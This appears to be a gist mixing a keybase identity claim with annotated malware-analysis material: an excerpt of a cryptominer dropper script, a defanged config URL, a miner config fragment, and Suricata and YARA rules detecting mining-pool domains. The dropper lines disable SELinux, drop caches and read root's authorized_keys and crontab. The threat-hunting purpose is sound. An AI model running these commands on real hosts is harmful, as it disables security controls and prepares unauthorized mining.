I hereby claim:
- I am gelossnake on github.
- I am gelossnake (https://keybase.io/gelossnake) on keybase.
- I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo
To claim this, I am signing this object:
#!/bin/sh | |
# NOTE(review): excerpt of a cryptominer dropper recovered from an incident. Kept byte-for-byte
# (including the trailing "| |" extraction residue on each line, which is NOT shell syntax) so
# it still matches the sample hash recorded below. Annotated for analysts; do not run.
#
# Defense evasion: put SELinux into permissive mode for the running system.
# Note the typo "2>dev/null" (no leading slash): stderr goes to a RELATIVE path dev/null.
# From cwd "/" that is /dev/null; from any other cwd the redirection fails and, in POSIX sh,
# the setenforce command is skipped entirely -- a detail worth checking when reconstructing
# what actually executed on the host.
setenforce 0 2>dev/null | |
# Persistence of the evasion: overwrite the RHEL/CentOS-style SELinux config so it stays
# disabled after reboot (the file path only exists on that family of distributions).
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null | |
# Flush dirty pages and drop the page/dentry/inode caches (root required). Why the miner
# wants this is not visible here -- presumably to free memory before mining starts.
sync && echo 3 >/proc/sys/vm/drop_caches | |
# Per-user crontab file under /var/spool/cron/ for the invoking user. If $USER is unset
# (common under some cron/sh invocations) this degenerates to the directory path itself.
crondir='/var/spool/cron/'"$USER" | |
# Snapshot of the existing crontab; how it is reused is outside this excerpt.
cont=`cat ${crondir}` | |
# Snapshot of root's SSH authorized_keys; later use (likely key injection) is not shown here,
# so treat /root/.ssh/authorized_keys as a file to diff against a known-good copy.
ssht=`cat /root/.ssh/authorized_keys` | |
# Writes a marker file. /etc/devtools containing "1" is a host-based IOC for this family;
# its exact role (infection marker vs. state) is not determinable from these lines.
echo 1 > /etc/devtools | |
rtdir="/etc/devtools" | |
# Path to curl, presumably for the payload download that follows this excerpt.
bbdir="/usr/bin/curl" |
Related sample SHA-256: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
Miner config source (defanged URL, do not re-arm): hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json
{ | |
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
"av": 0, // algorithm variation, 0 auto select | |
"background": true, // true to run the miner in the background | |
"colors": true, // false to disable colored output | |
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 |
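# DNS-query detections for public Monero mining pools used by this sample.
# Two forms are provided for pool.minergate.com: a dns_query (sticky buffer) rule for
# modern Suricata and a raw UDP/53 payload rule for legacy installs. The original listing
# gave both the same sid (20000000); Suricata treats a repeated sid/gid pair as a duplicate
# signature and drops or refuses the second one, so the legacy rule now has its own sid.
#
# Caveat for all three rules: they match the hostname, not the resolved answer, so a
# query from a threat-intel lookup or a sandbox will also fire. Correlate with the
# process that issued the query before escalating.

#Suricata 3.2+
# isdataat:!1,relative requires the match to end the queried name, so
# "pool.minergate.com.example" does not fire; a prefix such as "xpool.minergate.com" still would.
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;)

#Suricata 1.3+ (legacy, no dns_query keyword)
# Byte 2 of the DNS header must be 0x01 (standard query, RD set); after skipping byte 3,
# QDCOUNT=1 and ANCOUNT/NSCOUNT=0; then the label-encoded name. Unlike the dns_query form,
# this has no end-of-name anchor, so subdomain suffixes after .com also match.
alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000002; rev:1;)

#Suricata 3.2+
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;)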
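rule MinerGate
{
    meta:
        description = "References the MinerGate public mining pool domain (cryptominer config or binary)"
        // A bare domain string is a weak indicator on its own: it also appears in
        // threat-intel write-ups, browser history and DNS logs. Use for triage/hunting,
        // not as a standalone conviction.
        confidence = "low"
    strings:
        // nocase: DNS names are case-insensitive, so MINERGATE.COM must match too.
        // ascii wide: also catch UTF-16LE copies of the string (e.g. in Windows binaries).
        $a1 = "minergate.com" nocase ascii wide
    condition:
        $a1
}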
rule MoneroOrg | |
{ |